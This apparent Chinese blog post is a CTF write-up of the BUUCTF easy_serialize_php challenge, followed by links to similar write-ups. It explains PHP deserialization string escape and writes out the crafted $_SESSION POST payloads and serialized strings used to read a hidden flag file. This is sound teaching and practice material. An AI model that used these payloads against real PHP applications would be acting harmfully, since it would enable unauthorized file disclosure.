buuctf easy_serialize_php 解析

最新推荐文章于 2025-02-02 21:00:31 发布
原创 最新推荐文章于 2025-02-02 21:00:31 发布 · 270 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

文章讲述了通过审计代码发现一个可能的安全漏洞,涉及PHP的unserialize函数和base64编码。作者详细解析了如何构造payload,通过改变_SESSION变量的值,尤其是变量img,以尝试访问和解密潜在的flag文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

审计代码,可以看见这么一行注释

 在上面可以得出变量function是获取的变量f的值;变量f是通过get方式上传的数据

于是我们先尝试进入phpinfo界面看看有没有有关信息

b102ea65-4c60-49fc-92fe-1bd36750febf.node4.buuoj.cn:81/index.php?f=phpinfo

 在这里可以看见一个php文件,猜测可能是我们要找的flag。我们需要最后一个语句来打开这个文件

上面这串代码使用了unserialize函数。这个函数的意思是将字符串反序列化还原成原来的对象

并且可以通过下面的函数读取base64解密后的文件名,从而打开文件。

这里用到了一个概念叫做数据的反序列化

 通过字符串拆分的方法保存字符,这叫做字符的序列化

下面是对序列化后数据的解析

 回头看题目,变量serialize_info又是通过函数serialize序列化的变量SESSION

 由此,我们尝试从变量SESSION入手,构建payload。

从上面我们可以得知变量im_path为空时,_SESSION[img]的值为文件guest_imag.png的base64编码。 因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,于是我们尝试直接给_SESSION[img]赋值。先将d0g3_f1ag.php转换为base64编码

ZDBnM19mMWFnLnBocA==

 然后在本地写一个文件,将3个_SESSION值进行序列化

$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'a';
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';
var_dump(serialize($_SESSION));

我们得到

string(90) "a:3:{s:4:"user";s:5:"guest";s:8:"function";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"

将这里的user和function进行修改,然后这里会进行代码一开始的过滤,将变量$img中的php flag php5 php4 fl1g的字符串替换成’'空字符

$_SESSION["user"] = 'flagflagflagflagflagflag';
$_SESSION['function'] = 'a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA=='; 
var_dump(serialize($_SESSION));

得到

string(169) "a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"

过滤后:

string(169) "a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"

由于s:24 会往后边读取24位字符";s:8:"function";s:59:"a做为user的属性值,读取到a的时候结束,后面的;进行了闭合,相当于吞掉了一个属性和值,接着会继续读取我们构造的img,由于总共三个属性,我在后边加上了一个属性和值,后边的序列化结果直接就被丢弃

构建payload

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

得到

 将d0g3_f111111ag转化为base64编码L2QwZzNfZmxsbGxsbGFn,构建payload

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:2:"dd";s:1:"a";}

得到

 此题结束

lemofox
关注
buuctf easy_serialize_php
qq_52671379的博客
03-30 1962
buuctf easy_serialize_php
------已搬运-------BUUCTF:[安洵杯 2019]easy_serialize_php 1(extract,字符逃逸 session反序列化的另类~.~ )
Zero_Adam的博客
02-06 718
学到的 extract的覆盖数组的操作比如能够覆盖SESSION这个全局数组! 看phpinfo时的注意点 代码审计的能力 字符串逃逸,之前还有一条路可以走,但是后来发现走不通,不过也是个好思路 劝像我一样的rookies。本地自己实验很重要,那些大佬们的payload也是不知实验了多少次才出来的。本地实验的多了,自己也就明白了 源码+我的一些注释 源码多看几遍,找找思路,灵感 <?php $function = @$_GET['f']; function filter($img){ $f
buuctf-easy_serialize_php
m0_62593857的博客
04-20 189
serialize_info是$_SESSION序列化后的字符串经filter函数过滤后的值,而我们又可以通过extract函数通过post方法修改$_SESSION中的键值对,那么我们是否可以通过字符逃逸原理构造出键名为"img"的键值对呢?在filter函数中,发现'php','flag','php5','php4','fl1g'被过滤,因为这些字符串被替换为空字符串,导致序列化后的字符串字符数量减少,但记录的长度不变,我们就可利用这点构造出自己想要的变量和值,可构造payload。
buuctf[安洵杯 2019]easy_serialize_php
2202_75317918的博客
03-30 606
buuctf[安洵杯 2019]easy_serialize_php
BUUCTF [安洵杯 2019]easy_serialize_php
m0_62107966的博客
09-24 654
BUUCTF [安洵杯 2019]easy_serialize_phpphp反序列化时,当一整段内容反序列化结束后,后面的非法字符将会被忽略,而如何判断是否结束呢,可以看到,前面有一个a:3,表示序列化的内容是一个数组,有三个键,而以{作为序列化内容的起点,}作为序列化内容的终点。 所以此时后面的";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}在反序列化时就会被当作非法字符忽略掉,导致我们可以控制$userinfo["img"]的值,达到任意文件读取的效
BUUCTFeasy_serialize_php
最新发布
03-22
好的,我现在需要解决BUUCTFeasy_serialize这个PHP题目。首先,我得仔细看看用户提供的引用内容,里面提到了序列化、反序列化,还有一些漏洞的例子,比如类似phpmyadmin 4.8.1的漏洞,还有RoarCTF 2019的Easy Calc...
BUUCTFeasy_serialize_php 1
03-21
嗯,用户想了解BUUCTFeasy_serialize_php题目的解题思路。首先,我需要回忆一下PHP反序列化漏洞的基本知识。这类题目通常涉及对象逃逸或者魔法方法的利用。根据用户提供的引用,特别是引用[1]提到了对象逃逸,这...
BUUCTF-WEB
ccfly1012的博客
11-02 4153
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF WEB(12月刷题~)
A_dmin的博客
01-21 2239
BUUCTF WEB [RoarCTF 2019]Easy Java BUUCTF WEB [0CTF 2016]piapiapia BUUCTF WEB [CISCN2019 华北赛区 Day1 Web1]Dropbox BUUCTF WEB [CISCN2019 华北赛区 Day1 Web2]ikun BUUCTF WEB [BUUCTF 2018]Online Tool BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei BUUCTF WEB shrine
BUUCTF之[安洵杯 2019]easy_serialize_php--WP
weixin_51313108的博客
08-26 587
easy_serialize_php考点Write Up 考点 PHP反序列化的对象逃逸 俩种过滤函数:关键词增加和关键词减少 反序列化对象的逃逸有俩种策略:1.值逃逸 2.键逃逸 键/值逃逸: 因为序列化的字符串是严格的,对应的格式不能错,比如s:4:“name”,那s:4就必须有一个字符串长度是4的否则就往后要。 并且反序列化会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号{}外的就都被扔掉。 Write Up $function = @$_GET['f']; function
web buuctf [安洵杯 2019]easy_serialize_php
weixin_44214568的博客
04-02 546
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
buuctf-[安洵杯 2019]easy_serialize_php (小宇特详解)
小宇的web博客
02-24 2310
buuctf-[安洵杯 2019]easy_serialize_php (小宇特详解) 1.先看题目,出现了一段代码,进行代码审计 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_repla
easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
qwsn
11-24 1845
0x01、Web 1.easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF] 第一步:打开题目环境,进入题目链接,代码审计 <?php $function = @$_GET['f']; //GET传参:f function filter($img){ //函数:filter(),使用$img传参 $filter_arr = array('php','flag','php5','ph
php serialize ctf,CTF代码审计之[安洵杯 2019]easy_serialize_php
weixin_39569894的博客
03-26 273
[安洵杯 2019]easy_serialize_php考点:php反序列化逃逸}if($_SESSION){unset($_SESSION);}$_SESSION["user"] = ‘guest‘;$_SESSION[‘function‘] = $function;extract($_POST);if(!$function){echo ‘source_code‘;}if(!$_GET[‘img...
[CTF][安洵杯 2019]easy_serialize_php 1 -- 反序列化漏洞、反序列化字符逃逸
Gh0st_1n_The_Shell的博客
08-28 1778
[安洵杯 2019]easy_serialize_php 1 首先打开靶机,只有一个链接没有其他东西 目录爆破没有爆破出来东西,打开链接,发现给出了网站源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; retu
94,【2】buuctf web [安洵杯 2019]easy_serialize_php
2402_87039650的博客
02-02 651
要使$serialzie_info则需要存在img=>ZDBnM19mMWFnLnBocA==的键值对的序列化内容。要使$userinfo()的内容中存在img=>ZDBnM19mMWFnLnBocA==的键值对。并且源代码中说可以用get方式传递f。出现此页面,我们在里面找找信息。我们先将文件名进行64编码。回顾源代码,寻找方法。
BUUCTFphp反序列化
yzl_007的博客
10-23 1033
BUUCTFphp反序列化 [极客大挑战 2019]PHP __wakeup()绕过 有备份,盲猜www.zip,下载了网站源码,class.php 引用了flag.php //class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function _
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值